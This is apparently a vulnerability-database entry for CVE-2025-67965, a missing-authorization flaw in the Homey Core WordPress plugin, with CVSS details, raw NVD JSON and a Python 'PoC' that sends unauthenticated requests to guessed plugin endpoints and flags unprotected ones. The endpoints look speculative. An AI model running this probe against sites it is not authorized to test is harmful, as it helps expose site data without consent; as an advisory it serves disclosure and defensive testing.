Security Vulnerability Report
中文
CVE-2025-67965 CVSS 5.3 MEDIUM

CVE-2025-67965

Published: 2025-12-16 09:16:00
Last Modified: 2026-04-27 18:16:52

Description

Missing Authorization vulnerability in favethemes Homey Core homey-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Homey Core: from n/a through <= 2.4.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Homey Core <= 2.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def check_vulnerability(target_url): """ CVE-2025-67965 PoC - Homey Core Missing Authorization This PoC demonstrates checking for the missing authorization vulnerability in Homey Core plugin versions <= 2.4.3 """ # Common endpoints that might be affected endpoints = [ '/wp-json/homey/v1/settings', '/wp-json/homey/v1/config', '/wp-admin/admin-ajax.php', '/wp-json/homey/v1/users', '/wp-json/homey/v1/listings' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-67965 - Homey Core Missing Authorization Check") print("=" * 60) for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if we get unauthorized response or actual data if response.status_code == 200: # Check if response contains sensitive data if 'homey' in response.text.lower() or response.text != '{"code":"rest_forbidden","message":"REST API拒绝访问。","data":{"status":403}}': print(f"[!] Potential vulnerability found at: {url}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") elif response.status_code == 403: print(f"[+] Endpoint protected: {url}") else: print(f"[-] Endpoint: {url} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {e}") print("\n[*] PoC execution completed") print("[*] Note: This is for educational purposes only") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-site.com" check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67965", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:59.970", "lastModified": "2026-04-27T18:16:51.747", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in favethemes Homey Core homey-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Homey Core: from n/a through <= 2.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/homey-core/vulnerability/wordpress-homey-core-plugin-2-4-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}